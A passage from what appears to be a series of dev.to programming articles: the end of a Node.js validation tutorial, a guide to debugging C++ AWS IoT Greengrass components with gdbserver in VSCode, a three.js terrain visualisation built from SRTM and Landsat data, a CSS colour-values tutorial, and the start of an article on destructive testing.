inputError?: string;
/**
* Multiple Errors key (when strategy is set to all)
*
* @default errors
*/
inputErrors?: string;
};
/**
* Rules list that will be used in the validation process
*/
rules?: Record<string, typeof Rule>;
};
```
All types are pretty much self-explanatory except `rules`: here we used the `Record` utility type, which tells TypeScript that `rules` is an object whose keys are strings and whose values are `Rule` classes (`typeof Rule`).
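As a standalone illustration (simplified classes, not the project's actual ones), this is the shape that `Record<string, typeof Rule>` accepts — string keys, class values:

```typescript
// Simplified stand-ins for the project's rule classes.
class Rule {
  public static ruleName = "rule";
}
class RequiredRule extends Rule {
  public static ruleName = "required";
}

// Keys are strings, values are the classes themselves (not instances).
const rules: Record<string, typeof Rule> = {
  [RequiredRule.ruleName]: RequiredRule,
};

console.log(Object.keys(rules)); // [ 'required' ]
```

Because the values are classes, the validator can later instantiate them with `new rules[name](...)`.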
Now let's export it in the validator index then import it in the `validator.ts` configuration file.
```ts
// src/core/validator/index.ts
export { default as RequiredRule } from "./rules/required";
export { default as Rule } from "./rules/rule";
export { default as StringRule } from "./rules/string";
export * from "./types";
export { default as Validator } from "./validator";
```
```ts
// src/config/validation.ts
import {
RequiredRule,
StringRule,
ValidationConfigurations,
} from "core/validator";
const validationConfigurations: ValidationConfigurations = {
stopOnFirstFailure: true,
returnErrorStrategy: "first",
responseStatus: 400,
rules: {
[RequiredRule.ruleName]: RequiredRule,
[StringRule.ruleName]: StringRule,
},
keys: {
response: "messages",
inputKey: "key",
inputError: "error",
inputErrors: "errors",
},
};
export default validationConfigurations;
```
The amazing thing about typescript, is that now you can use the auto complete feature in your vscode.
Try to remove all configurations and inside the object press `ctrl + space` and you will see all the configurations that you can use.
## Missing Rule Handler
As the project grows, we need to make sure our code works as expected. What if we tried to use a rule that does not exist in the `rules` list?
In that case the application would crash, so let's add a handler for that.
```ts
// src/core/validator/rules-list.ts
import chalk from "chalk";
// ...inside the RulesList class
/**
* Validate the rules
*/
public async validate() {
for (const ruleName of this.rules) {
const RuleClass = config.get(`validation.rules.${ruleName}`);
if (!RuleClass) {
throw new Error(
chalk.bold(
`Missing Rule: ${chalk.redBright(
ruleName,
)} rule is not listed in ${chalk.cyan(
"validation.rules",
)} configurations,`,
),
);
}
const rule = new RuleClass(this.input, this.value);
await rule.validate();
if (rule.fails()) {
this.errorsList.push(rule.error());
if (config.get("validation.stopOnFirstFailure", true)) {
break;
}
}
}
}
```
We added a check here to see if the rule exists in the `rules` list, if not then we throw an error.
But we need to catch that error so it gets displayed; otherwise you won't see anything in the console.
Open the request class to wrap the validator in a try catch block.
```ts
// src/core/http/request.ts
/**
* Execute the request
*/
public async execute() {
if (this.handler.validation) {
const validator = new Validator(this, this.handler.validation.rules);
try {
await validator.scan(); // start scanning the rules
} catch (error) {
// this is needed to catch the error thrown by the missing rule handler
console.log(error);
}
if (validator.fails()) {
const responseErrorsKey = config.get(
"validation.keys.response",
"errors",
);
const responseStatus = config.get("validation.responseStatus", 400);
return this.response.status(responseStatus).send({
[responseErrorsKey]: validator.errors(),
});
}
}
return await this.handler(this, this.response);
}
```
Now go to `create-user` and add an `email` rule, which is not listed in the `validation.rules` configuration.
> Mark `stopOnFirstFailure` as `false` in the `validation.ts` file to see the difference.
You should now see something like this in your terminal:

## Custom Validation
We are in good shape with validation so far, but sometimes rules are not enough: we might need to perform custom validation on a request beyond what the rules cover.
That's where we'll introduce a new `validate` method in the handler `validation` object.
## Validate Method
The handler (controller) has a `validation` property, which contains the `rules` property to validate inputs.
We will also add the ability to add a `validate` method to the `validation` object so we can do any custom validation.
## How it works
The `validate` method will receive the request and the response as parameters, and it will be executed after the rules validation.
If the `validate` method returns a value, this will be returned, otherwise the handler will be executed.
Also we'll make it `async` function so we can perform any async operation inside it.
Let's jump into the code.
```ts
// src/core/http/request.ts
/**
* Execute the request
*/
public async execute() {
if (this.handler.validation) {
// rules validation
if (this.handler.validation.rules) {
const validator = new Validator(this, this.handler.validation.rules);
try {
await validator.scan(); // start scanning the rules
} catch (error) {
console.log(error);
}
if (validator.fails()) {
const responseErrorsKey = config.get(
"validation.keys.response",
"errors",
);
const responseStatus = config.get("validation.responseStatus", 400);
return this.response.status(responseStatus).send({
[responseErrorsKey]: validator.errors(),
});
}
}
// custom validation
if (this.handler.validation.validate) {
const result = await this.handler.validation.validate(
this,
this.response,
);
if (result) {
return result;
}
}
}
return await this.handler(this, this.response);
}
```
We wrapped the `rules` validation in a new if statement to check whether the handler has a `rules` property.
If it exists, it is executed and validated first; if it fails, neither the custom validator nor the handler runs.
Now let's give it a try, open `create-user` handler and add the `validate` method.
```ts
// src/app/users/controllers/create-user.ts
import { Request } from "core/http/request";
export default async function createUser(request: Request) {
const { name, email } = request.body;
return {
name,
};
}
createUser.validation = {
// rules: {
// name: ["required", "string"],
// email: ["required", "string"],
// },
validate: async () => {
return {
error: "Bad Request",
};
},
};
```
We commented out the rules for testing purposes only, and added a `validate` method that returns an object.
If `validate` returns any value, that value is sent as the response; otherwise the handler is executed.
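The flow can be sketched in isolation like this (simplified signatures — the real implementation passes the request and response objects):

```typescript
// Minimal stand-ins for the framework's handler shape.
type Validation = { validate?: () => Promise<unknown> };
type Handler = (() => unknown) & { validation?: Validation };

async function execute(handler: Handler): Promise<unknown> {
  const validate = handler.validation?.validate;
  if (validate) {
    const result = await validate();
    if (result) return result; // custom validation short-circuits the handler
  }
  return handler(); // otherwise the handler runs normally
}

const createUser: Handler = () => ({ name: "Jane" });
createUser.validation = {
  validate: async () => ({ error: "Bad Request" }),
};

execute(createUser).then(console.log); // { error: 'Bad Request' }
```

Remove the `validate` method (or return nothing from it) and `execute` falls through to the handler itself.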
## Conclusion
We've reached the end of this article, we've added the configurations types, we also wrapped the rules validation in a try catch block to catch any errors thrown by the rules.
Also we added a custom validation method to the handler, so we can do any custom validation on the request.
## 🎨 Project Repository
You can find the latest updates of this project on [Github](https://github.com/hassanzohdy/nodejs-2023)
## 😍 Join our community
Join our community on [Discord](https://discord.gg/pb2vmdfhGf) to get help and support (Node Js 2023 Channel).
## 🎞️ Video Course (Arabic Voice)
If you want to learn this course in video format, you can find it on [Youtube](https://www.youtube.com/playlist?list=PLGO8ntvxgiZMJc7RN2lIq9WmMOlWZGzmz), the course is in Arabic language.
## 💰 Bonus Content 💰
You may have a look at these articles, it will definitely boost your knowledge and productivity.
General Topics
- [Event Driven Architecture: A Practical Guide in Javascript](https://dev.to/hassanzohdy/event-driven-architecture-the-best-paradigm-that-i-love-to-work-with-in-javascript-and-node-js-1gnk)
- [Best Practices For Case Styles: Camel, Pascal, Snake, and Kebab Case In Node And Javascript](https://dev.to/hassanzohdy/best-practices-for-case-styles-camel-pascal-snake-and-kebab-case-in-node-and-javascript-55oi)
- [After 6 years of practicing MongoDB, Here are my thoughts on MongoDB vs MySQL
](https://dev.to/hassanzohdy/after-6-years-of-practicing-mongodb-here-are-my-thoughts-on-mongodb-vs-mysql-574b)
Packages & Libraries
- [Collections: Your ultimate Javascript Arrays Manager](https://dev.to/hassanzohdy/collections-your-ultimate-javascript-array-handler-3o15)
- [Supportive Is: an elegant utility to check types of values in JavaScript](https://dev.to/hassanzohdy/supportive-is-an-elegant-utility-to-check-types-of-values-in-javascript-1b3e)
- [Localization: An agnostic i18n package to manage localization in your project](https://dev.to/hassanzohdy/mongez-localization-the-simplest-way-to-translate-your-website-regardless-your-favorite-framework-4gi3)
React Js Packages
- [useFetcher: easiest way to fetch data in React Js](https://dev.to/hassanzohdy/usefetcher-the-easiest-way-to-fetch-data-in-react-45o9)
Courses (Articles)
- [React Js: Let's Create File Manager With React Js and Node Js](https://dev.to/hassanzohdy/lets-create-a-file-manager-from-scratch-with-react-and-typescript-chapter-i-a-good-way-to-expand-your-experience-5g4k)
| hassanzohdy |
1,240,029 | Debugging C/C++ AWS IoT Greengrass Components using VSCode | In most scenarios, simply logging the output of the application is enough to understand what is... | 0 | 2022-11-02T08:49:53 | https://dev.to/iotbuilders/debugging-cc-greengrass-components-using-vscode-1nbh | iot, greengrass |
In most scenarios, simply logging the application's output is enough to understand what is happening and to debug a misbehaviour. Sometimes, however, stepping through the code while the application is executing is the most efficient way to catch a stubborn bug. AWS IoT Greengrass provides a CLI tool that lets local components be deployed and tested, with access to the application logs, but when we want to step through the code of a C/C++ component and inspect its stack and other parts of memory, we need some additional configuration, which we will cover in this post.
## Prerequisites
For this setup I will be using an EC2 instance running Ubuntu 22.04, with tools like `gdb`, `gdbserver`, `cmake`, and `build-essential` installed, and with VSCode configured for [Remote Development using SSH](https://code.visualstudio.com/docs/remote/ssh). For installing AWS IoT Greengrass, I'll be following the installation instructions in the [Getting Started guide](https://docs.aws.amazon.com/greengrass/v2/developerguide/getting-started.html), but any variation that provides the tools mentioned above, with AWS IoT Greengrass and the Greengrass CLI installed and running, should work.
>Note that to install the Greengrass CLI together with Greengrass, supply the installer with the parameter `--deploy-dev-tools true`, which adds the Greengrass CLI component.
## Building and Running the C++ Application
Before we can build our C++ application, we need to make sure that the AWS IoT Device SDK for C++ v2 is built and available to link against, as it provides the Greengrass IPC library.
```
# Create a workspace directory to hold all the SDK files
mkdir sdk-workspace
cd sdk-workspace
# Clone the repository
git clone --recursive https://github.com/aws/aws-iot-device-sdk-cpp-v2.git
# Ensure all submodules are properly updated
cd aws-iot-device-sdk-cpp-v2
git submodule update --init --recursive
cd ..
# Make a build directory for the SDK. Can use any name.
# If working with multiple SDKs, using a SDK-specific name is helpful.
mkdir aws-iot-device-sdk-cpp-v2-build
cd aws-iot-device-sdk-cpp-v2-build
# Generate the SDK build files.
# -DCMAKE_INSTALL_PREFIX needs to be the absolute/full path to the directory.
# (Example: "/home/ubuntu/sdk-workspace/aws-iot-device-sdk-cpp-v2-build).
cmake -DCMAKE_INSTALL_PREFIX="/home/ubuntu/sdk-workspace/aws-iot-device-sdk-cpp-v2-build" ../aws-iot-device-sdk-cpp-v2
# Build and install the library. Once installed, you can develop with the SDK and run the samples
# -config can be "Release", "RelWithDebInfo", or "Debug"
cmake --build . --target install --config "Debug"
```
If everything builds successfully we can now go back and create our application directory and a C++ example:
```
cd ../../
mkdir hello-world
cd hello-world
```
In here let’s create a simple `CMakeLists.txt` file:
```
cmake_minimum_required(VERSION 3.1)
project (hello-world)
file(GLOB MAIN_SRC
"*.h"
"*.cpp"
)
add_executable(${PROJECT_NAME} ${MAIN_SRC})
set_target_properties(${PROJECT_NAME} PROPERTIES
LINKER_LANGUAGE CXX
CXX_STANDARD 11)
find_package(aws-crt-cpp PATHS ~/sdk-workspace/aws-iot-device-sdk-cpp-v2-build)
find_package(EventstreamRpc-cpp PATHS ~/sdk-workspace/aws-iot-device-sdk-cpp-v2-build)
find_package(GreengrassIpc-cpp PATHS ~/sdk-workspace/aws-iot-device-sdk-cpp-v2-build)
target_link_libraries(${PROJECT_NAME} AWS::GreengrassIpc-cpp)
```
Finally, let's create our C++ example file, `main.cpp`, which subscribes to a specific MQTT topic (`test/topic/cpp`) and prints out received messages:
```
#include <iostream>
#include <thread>
#include <aws/crt/Api.h>
#include <aws/greengrass/GreengrassCoreIpcClient.h>
using namespace Aws::Crt;
using namespace Aws::Greengrass;
class IoTCoreResponseHandler : public SubscribeToIoTCoreStreamHandler {
public:
virtual ~IoTCoreResponseHandler() {}
private:
void OnStreamEvent(IoTCoreMessage *response) override {
auto message = response->GetMessage();
if (message.has_value() && message.value().GetPayload().has_value()) {
auto messageBytes = message.value().GetPayload().value();
std::string messageString(messageBytes.begin(), messageBytes.end());
std::string messageTopic = message.value().GetTopicName().value().c_str();
std::cout << "Received new message on topic: " << messageTopic << std::endl;
std::cout << "Message: " << messageString << std::endl;
}
}
bool OnStreamError(OperationError *error) override {
std::cout << "Received an operation error: ";
if (error->GetMessage().has_value()) {
std::cout << error->GetMessage().value();
}
std::cout << std::endl;
return false; // Return true to close stream, false to keep stream open.
}
void OnStreamClosed() override {
std::cout << "Subscribe to IoT Core stream closed." << std::endl;
}
};
class IpcClientLifecycleHandler : public ConnectionLifecycleHandler {
void OnConnectCallback() override {
std::cout << "OnConnectCallback" << std::endl;
}
void OnDisconnectCallback(RpcError error) override {
std::cout << "OnDisconnectCallback: " << error.StatusToString() << std::endl;
exit(-1);
}
bool OnErrorCallback(RpcError error) override {
std::cout << "OnErrorCallback: " << error.StatusToString() << std::endl;
return true;
}
};
int main() {
String topic("test/topic/cpp");
QOS qos = QOS_AT_LEAST_ONCE;
int timeout = 10;
ApiHandle apiHandle(g_allocator);
Io::EventLoopGroup eventLoopGroup(1);
Io::DefaultHostResolver socketResolver(eventLoopGroup, 64, 30);
Io::ClientBootstrap bootstrap(eventLoopGroup, socketResolver);
IpcClientLifecycleHandler ipcLifecycleHandler;
GreengrassCoreIpcClient ipcClient(bootstrap);
auto connectionStatus = ipcClient.Connect(ipcLifecycleHandler).get();
if (!connectionStatus) {
std::cerr << "Failed to establish IPC connection: " << connectionStatus.StatusToString() << std::endl;
exit(-1);
}
SubscribeToIoTCoreRequest request;
request.SetTopicName(topic);
request.SetQos(qos);
auto streamHandler = MakeShared<IoTCoreResponseHandler>(DefaultAllocator());
auto operation = ipcClient.NewSubscribeToIoTCore(streamHandler);
auto activate = operation->Activate(request, nullptr);
activate.wait();
auto responseFuture = operation->GetResult();
if (responseFuture.wait_for(std::chrono::seconds(timeout)) == std::future_status::timeout) {
std::cerr << "Operation timed out while waiting for response from Greengrass Core." << std::endl;
exit(-1);
}
auto response = responseFuture.get();
if (response) {
std::cout << "Successfully subscribed to topic: " << topic << std::endl;
} else {
// An error occurred.
std::cout << "Failed to subscribe to topic: " << topic << std::endl;
auto errorType = response.GetResultType();
if (errorType == OPERATION_ERROR) {
auto *error = response.GetOperationError();
std::cout << "Operation error: " << error->GetMessage().value() << std::endl;
} else {
std::cout << "RPC error: " << response.GetRpcError() << std::endl;
}
exit(-1);
}
// Keep the main thread alive, or the process will exit.
while (true) {
std::this_thread::sleep_for(std::chrono::seconds(10));
}
operation->Close();
return 0;
}
```
At this point we should be able to build the application:
```
mkdir build
cd build
cmake -DCMAKE_PREFIX_PATH="/home/ubuntu/sdk-workspace/aws-iot-device-sdk-cpp-v2-build" -DCMAKE_BUILD_TYPE="Debug" ..
cmake --build . --config "Debug"
```
Since this only works in the context of Greengrass, we need to prepare the component recipe YAML file as well as the artifact:
```
cd ..
mkdir -p gg/artifacts/com.example.HelloWorld/1.0.0
mkdir -p gg/recipes
touch gg/recipes/com.example.HelloWorld-1.0.0.yaml
```
Where the content of the `com.example.HelloWorld-1.0.0.yaml` would be:
```
RecipeFormatVersion: '2020-01-25'
ComponentName: com.example.HelloWorld
ComponentVersion: 1.0.0
ComponentDescription: My C++ component.
ComponentConfiguration:
DefaultConfiguration:
accessControl:
aws.greengrass.ipc.mqttproxy:
com.example.HelloWorld:mqttproxy:1:
policyDescription: Allows access to subscribe to a topics.
operations:
- aws.greengrass#SubscribeToIoTCore
resources:
- "test/topic/cpp"
Manifests:
- Platform:
os: linux
Lifecycle:
Run: "{artifacts:path}/hello-world"
```
Now we can copy the `hello-world` binary to artifacts directory and deploy the component to Greengrass:
```
cp build/hello-world gg/artifacts/com.example.HelloWorld/1.0.0/
sudo /greengrass/v2/bin/greengrass-cli deployment create \
--recipeDir gg/recipes \
--artifactDir gg/artifacts \
--merge "com.example.HelloWorld=1.0.0"
```
After this, if we look at the logs, we should see:
```
sudo bash -c "cat /greengrass/v2/logs/com.example.HelloWorld.log"
...
com.example.HelloWorld: stdout. Successfully subscribed to topic: test/topic/cpp. {scriptName=services.com.example.HelloWorld.lifecycle.Run, serviceName=com.example.HelloWorld, currentState=RUNNING}
```
Once we verify that this is working properly, we can jump to the part where we actually do a step through debugging.
## Debugging using GDB and VSCode
First let’s set up our `.vscode/launch.json` to use the `gdbserver`
```
{
"version": "0.2.0",
"configurations": [
{
"name": "HelloWorld GG Component",
"type": "cppdbg",
"request": "launch",
"program": "${workspaceFolder}/hello-world/gg/artifacts/com.example.HelloWorld/1.0.0/hello-world",
"miDebuggerServerAddress": "localhost:9091",
"args": [],
"stopAtEntry": true,
"cwd": "${workspaceRoot}",
"environment": [],
"externalConsole": false,
"serverStarted": "Listening on port",
"filterStderr": true,
"setupCommands": [
{
"description": "Enable pretty-printing for gdb",
"text": "enable-pretty-printing",
"ignoreFailures": true,
}
],
"MIMode": "gdb",
}
]
}
```
While this is a typical configuration, there are two things we need to make sure are set correctly:
1. `program` points to where the actual artifact is installed by the Greengrass CLI,
2. `miDebuggerServerAddress` is set to the right host and port. Since we are doing this locally, we use `localhost`, and the port of choice is `9091`, which must match what we use when modifying the Greengrass component recipe.
Next we will instruct Greengrass to start the `gdbserver` when starting the component, which will allow us to use `gdb` for remote debugging.
```
RecipeFormatVersion: '2020-01-25'
ComponentName: com.example.HelloWorld
ComponentVersion: 1.0.0
ComponentDescription: My C++ component.
ComponentConfiguration:
DefaultConfiguration:
accessControl:
aws.greengrass.ipc.mqttproxy:
com.example.HelloWorld:mqttproxy:1:
policyDescription: Allows access to subscribe to a topics.
operations:
- aws.greengrass#SubscribeToIoTCore
resources:
- "test/topic/cpp"
Manifests:
- Platform:
os: linux
Lifecycle:
Run: "gdbserver :9091 {artifacts:path}/hello-world"
```
Here the only difference is the `Run` command, which we prefixed with `gdbserver :9091`. Once this is done, we can redeploy the component:
```
sudo /greengrass/v2/bin/greengrass-cli deployment create \
--recipeDir gg/recipes \
--artifactDir gg/artifacts \
--merge "com.example.HelloWorld=1.0.0"
```
After which we should see the following in the component logs:
```
sudo bash -c "cat /greengrass/v2/logs/com.example.HelloWorld.log"
com.example.HelloWorld: stderr. Listening on port 9091. {scriptName=services.com.example.HelloWorld.lifecycle.Run, serviceName=com.example.HelloWorld, currentState=RUNNING}
```
At this point, we can just create a breakpoint and start the debugging session:

We can then put a breakpoint at line 19, which will let us stop the application upon retrieval of a message from AWS IoT Core.
In order to test this, go to the AWS console → AWS IoT Core → MQTT test client → Publish to a topic, and publish a message to `test/topic/cpp` like the example below.

We will be able to catch this with the breakpoint and step through if necessary.

Additionally, after the message is received and processed, we will see it in the component log as well.
## Conclusion
This setup allows us to use `gdbserver` / `gdb` and VSCode to visualise and inspect what is happening in our GGv2 components. We can go further and even debug multiple components at the same time; the only thing we would need to change is the `gdbserver` port each application runs on, modifying each recipe accordingly.
If you find this interesting or have suggestions for future topics feel free to reach out here or @nenadilc84 on [Twitter](https://twitter.com/nenadilic84) or [LinkedIn](https://www.linkedin.com/in/nenadilic84/).
> There is also a [video](https://youtu.be/qMNZJ0CHZ9U) version of this blog
| nenadilic84 |
1,240,386 | Visualizing a mountain using Three.js, Landsat and SRTM | Originally posted on Medium on Mar 11, 2019... | 0 | 2022-11-15T19:41:10 | https://dev.to/orabazu/visualizing-a-mountain-using-threejs-landsat-and-srtm-50kp | threejs, gis, 3d, webdev |
Originally posted on Medium on Mar 11, 2019
https://zubazor.medium.com/visualizing-a-mountain-using-three-js-landsat-and-srtm-26275c920e34
TL;DR
-----
Using freely available satellite data and Javascript you can visualize a topography on earth. Link to source [code](https://github.com/zhunor/threejs-dem-visualizer) and [demo](https://zhunor.github.io/threejs-dem-visualizer/). If you think it’s going to be fun let’s continue.
<img src="https://media.giphy.com/media/r07K4fvHDD8Z2/giphy.gif" style="width: 100%"/>
Mount What?
-----------
A few weeks back, I decided to spend some of my leisure time with Three.js. I decided to visualize a 3D model of Turkey's highest mountain, Mount Ağrı, using only freely available satellite data and Javascript. As the Romantic poet William Blake once said, "Great things are done when men and mountains meet". So, Willy, this is going to be hilarious, baby.
Bootstrapping with ES6 and Webpack
----------------------------------
There are plenty of good examples on Github, but I'll go forward with [https://github.com/jackdbd/threejs-es6-webpack-starter](https://github.com/jackdbd/threejs-es6-webpack-starter) because it has all of the features I need and more, and is also easy to understand.
DATA
----
Mount Ağrı
The data I am going to use is freely available, provided by the [USGS](https://twitter.com/usgs). Using Earth Explorer, I downloaded a DEM (Digital Elevation Model) and a satellite image of Mount Ağrı, a dormant volcano and also the highest mountain in Turkey.
I downloaded a few images using the USGS application, then tried to find an image with cloud coverage of less than 10%.

Downloading image from [https://earthexplorer.usgs.gov/](https://earthexplorer.usgs.gov/)
The Good, The Bad and The Landsat 🛰️
-------------------------------------
If you are not familiar with remote sensing and image processing you might not have heard of Landsat, but it is a continuous satellite mission operated by the USGS that has provided scientific satellite imagery to researchers for many years, at a resolution of approximately 30 m. One pixel of the image covers a 30 m × 30 m area where the satellite's camera is perpendicular to the earth. Nowadays some satellites have sub-meter resolution, but they are generally not freely available. So, Landsat is neither especially good nor bad, but it is enough for us; we are going to use this loyal old fella for our textures.
[https://earthexplorer.usgs.gov/](https://earthexplorer.usgs.gov/) is the source for downloading free satellite imagery. The images should have cloud coverage of less than 10%, which should be added to the search criteria. It was hard to find a good one, since the mountain is so high that it is cloudy almost all the time. After finding a suitable image, I realized that a Landsat scene covers a huge area, so I needed to crop my area of interest. After cropping, this becomes the texture of the model. More importantly, I need an elevation model to visualize the mountain.
SRTM — I don’t give a DEM 🗻
----------------------------
Yeah, actually it gives a DEM. DEM stands for Digital Elevation Model, and it is raster-based elevation data. SRTM, which stands for "Shuttle Radar Topography Mission", was operated by NASA ([https://www2.jpl.nasa.gov/srtm/](https://www2.jpl.nasa.gov/srtm/)). SRTM offers a DEM with 30 m resolution. Let's recall: that means one pixel covers an area of approximately 30 m × 30 m, with the average elevation of that area as the pixel value. This data is extremely valuable for generating our mountain model in three.js.
Pre Processing
--------------
I used QGIS, one of my favorite GIS products. I clipped and masked the DEM and the related satellite image using QGIS raster tools and copied them to the working directory.

Clipping the image and DEM in QGIS. Looks kind of scary: the digital elevation model over the satellite image.

Looks like Mount Doom, but this is how the elevation model looks in QGIS with the default color palette. I clipped two different sizes for performance reasons; you can find both in the repo. I use the small one in the demo to see results quickly.
Three.js
--------
Three.js is an excellent library for using WebGL easily. It might seem complicated at first glance, so we will slice it into pieces to understand it better.
Lights, Camera, Action
----------------------
To get started with three.js at a beginner level, this tutorial is very helpful: [https://aerotwist.com/tutorials/getting-started-with-three-js/](https://aerotwist.com/tutorials/getting-started-with-three-js/)
In Three.js world we need some basic setup. 4 basic components
1. A scene
2. A renderer
3. A camera
4. An object or two (with materials)
A note about materials
----------------------
I don't care about materials in this example because the satellite image is already lit by the sun itself at acquisition time. We therefore get natural cloud shadows according to the sun angle, so I don't mind which angle the light is coming from either. If you are curious, you can dig into the metadata file of the Landsat image to find out the sun angle at the time the image was acquired. You could then simulate the same light with shaders, etc. If you want real reflections, you can consider using some of the shapes above.
Materials and reflections
Let’s start
-----------
We’ll start with adding a scene, then we’ll set renderer, camera, controls, and light. Adding light is crucial otherwise you cannot see anything on the scene.
Shaping The Mountain
--------------------
The geometry of our object is not modeled in Blender, Maya, or something similar. Those kinds of models can be imported into three.js easily, but I am going to use the DEM file to generate the model directly in JS with the help of the "geotiff" library.
Reading Image
-------------
Inside `setupTerrainModel`, after adding the clipped images to the project, we use the geotiff library to read the DEM file and add a new `PlaneGeometry` object, passing the size of the image. Ok, let's generate the big boy.
<img src="https://media.giphy.com/media/3o8doT5DaMjfH3paHC/giphy.gif" style="width: 100%"/>
Then we read the pixel values, each of which corresponds to an elevation value. I heuristically divide each value by 20 to make it look nice, and multiply it by -1; otherwise the model would be upside down because of the direction of the z-coordinate in three.js, which I'll explain later. Using `console.time` lets us see the performance.
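The elevation-to-vertex mapping described here is simple arithmetic; as a standalone sketch (in Python rather than JS for brevity, with the factor 20 being the heuristic from the text):

```python
def dem_to_vertex_heights(pixels, attenuation=20):
    """Map raw DEM elevations to mesh z-values: scale down and negate,
    mirroring the divide-by-20, multiply-by-minus-one heuristic."""
    return [-value / attenuation for value in pixels]

# 5137 m is roughly the summit elevation of Mount Agri.
print(dem_to_vertex_heights([0, 1000, 5137]))
```

Each DEM pixel becomes one vertex height; the negation compensates for the z-axis direction before the mesh is rotated.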
From now on, our model is ready to pop up in the browser, but without a satellite image it is only a 3D mesh and will look like the one below.

3D mesh of Mount Ağrı in three.js
Texture Fitting
---------------
After generating the model, we are going to use an RGB satellite image which is also clipped with QGIS earlier.
We load the satellite image and keep it in a variable called "material" to use with `THREE.Mesh` right after. And don't forget to rotate the object, because three.js uses a right-handed coordinate system, which means that by default the Z-axis points not upwards but towards you. For a detailed explanation: [https://tweedegolf.nl/blog/5/threejs-rotations](https://tweedegolf.nl/blog/5/threejs-rotations)
You can either rotate the x-axis, or rotate the camera at the beginning with `camera.up.set(0,0,1)`. Rotating the x-axis, placing our mountain just above, and moving it down a little along the y-axis: let's run, and swish. It is ready.
Demo & Source Code
------------------

There are two versions of DEM model (one is very large) you can test it in your local environment. I’ve used the small version for the demo. [https://zhunor.github.io/threejs-dem-visualizer/](https://zhunor.github.io/threejs-dem-visualizer/) [https://github.com/zhunor/threejs-dem-visualizer](https://github.com/zhunor/threejs-dem-visualizer)
Credits & Gains
---------------
Well, first of all, it is hard to find a nice cloudless image. Secondly, generating a 3D model with all the detail is extremely costly. The DEM should probably be downscaled to a reasonable resolution if someone really wants to do this client-side.
Tutorials of [https://github.com/jonathanlurie/ThreejsDEM](https://github.com/jonathanlurie/ThreejsDEM) and [http://blog.mastermaps.com/2013/10/terrain-building-with-threejs.html](http://blog.mastermaps.com/2013/10/terrain-building-with-threejs.html) was extremely helpful. Thank you guys.
| orabazu |
319,475 | CSS: Color Values | Colour is an integral part of designing a website. Proper colour usage makes a user's experience grow... | 5,765 | 2020-04-25T20:43:27 | https://dev.to/koralarts/css-color-values-48pl | tutorial, beginners, css, webdev | Colour is an integral part of designing a website. Proper colour usage makes a user's experience grow!
## Named colours
CSS has provided us with named colours. There are plenty of these and they can be used by simply using their names.
```css
div {
color: red;
background-color: violet;
border-color: black;
}
```
Here's a list of them: [CSS Named Colours](http://www.colors.commutercreative.com/grid/)
## Hex Values
Hex values are probably the most common colour format you've seen. The hex value starts off with a hash symbol (`#`) followed by 6 characters each ranging from `0` to `F`. Each pair corresponds to the intensity of red, green, or blue.

```css
div {
color: #FF0000; /* Red */
background-color: #FF00FF; /* Violet */
border-color: #000000; /* Black */
}
```
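Since each hex pair is just a red, green, or blue intensity written in base 16, the correspondence to `rgb()` values can be computed directly. A small Python sketch of the mapping:

```python
def hex_to_rgb(hex_color):
    """Split a #RRGGBB string into its three 0-255 channel intensities."""
    value = hex_color.lstrip("#")
    # Each two-character slice is one base-16 channel value.
    return tuple(int(value[i:i + 2], 16) for i in (0, 2, 4))

print(hex_to_rgb("#FF0000"))  # (255, 0, 0)   -> red
print(hex_to_rgb("#FF00FF"))  # (255, 0, 255) -> violet
print(hex_to_rgb("#000000"))  # (0, 0, 0)     -> black
```

This is exactly why `#FF0000` and `rgb(255, 0, 0)` describe the same colour.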
## `rgb`
The RGB value is similar to hex values. Where you specify the intensity of the red, green, and blue to create a colour. The main difference, aside from structure, is it goes from `0` to `255`.

```css
div {
color: rgb(255, 0, 0); /* Red */
background-color: rgb(255, 0, 255); /* Violet */
border-color: rgb(0, 0, 0); /* Black */
}
```
## `rgba`
RGBA is exactly the same as RGB but you can now specify the opacity of the colour where `0` is transparent and `1` is fully opaque.

```css
div {
color: rgba(255, 0, 0, 1); /* Red fully opaque */
background-color: rgba(255, 0, 255, 0.5); /* Violet 50% transparent */
border-color: rgba(0, 0, 0, 0); /* Black fully transparent */
}
```
## `hsl`
HSL stands for hue, saturation and lightness. This is typically the least popular way to add colour as it's difficult to understand.
**Hue**[`0-360`]: The angle of where your target colour is in a colour wheel.
**Saturation**[`0%-100%`]: The amount of saturation
**Lightness**[`0%-100%`]: The amount of brightness

```css
div {
  color: hsl(0, 100%, 50%); /* Red */
  background-color: hsl(300, 100%, 50%); /* Violet */
  border-color: hsl(0, 0%, 0%); /* Black */
}
```
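To see how the hue angle maps onto the RGB channels, Python's standard `colorsys` module can do the conversion (note that it uses HLS ordering and 0-1 floats instead of degrees and percentages):

```python
import colorsys

def hsl_to_rgb255(h_deg, s_pct, l_pct):
    """Convert CSS-style hsl(h, s%, l%) values to 0-255 RGB channels."""
    # colorsys expects hue, LIGHTNESS, saturation, each normalized to 0-1.
    r, g, b = colorsys.hls_to_rgb(h_deg / 360, l_pct / 100, s_pct / 100)
    return tuple(round(c * 255) for c in (r, g, b))

print(hsl_to_rgb255(0, 100, 50))    # (255, 0, 0)   -> red
print(hsl_to_rgb255(300, 100, 50))  # (255, 0, 255) -> violet
print(hsl_to_rgb255(0, 0, 0))       # (0, 0, 0)     -> black
```

A hue of 0° is red, 120° is green, and 240° is blue; lightness of 0% is always black and 100% is always white, regardless of hue.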
## `hsla`
HSLA now adds opacity to the regular HSL where `0` is fully transparent and `1` is fully opaque.

```css
div {
  color: hsla(0, 100%, 50%, 1); /* Red fully opaque */
  background-color: hsla(300, 100%, 50%, 0.5); /* Violet 50% transparent */
  border-color: hsla(0, 0%, 0%, 0); /* Black fully transparent */
}
``` | koralarts |
1,240,452 | Leveraging Destructive and Non-destructive Testing in Application Development | Software testing is a crucial phase of a software development life cycle that helps evaluate whether... | 0 | 2022-11-11T05:05:55 | https://dev.to/sudip_sg/leveraging-destructive-and-non-destructive-testing-in-application-development-5ene | Software testing is a crucial phase of a software development life cycle that helps evaluate whether the application meets the expected requirements. A common approach is examining the software’s behavior and artifacts through component verification and validation. As an interdisciplinary application development field, testing relies on manual and automated tools to evaluate and document the risks associated with software implementation.
While there are various approaches to product-based testing, two such techniques include **destructive** and **non-destructive testing,** which follow contrarian methods to test for flaws and vulnerabilities. Destructive testing causes a component of the application to fail uncontrollably, allowing security experts to gauge the software’s robustness and identify the points of failure. The non-destructive testing technique, also known as **positive** or **happy path testing,** involves engaging with the application per the intended workflow and producing the desired output to ensure the software works as expected.
In this article, we discuss how destructive and non-destructive testing approaches work in application development and how they differ from each other.
## What is Destructive Testing in Application Development?
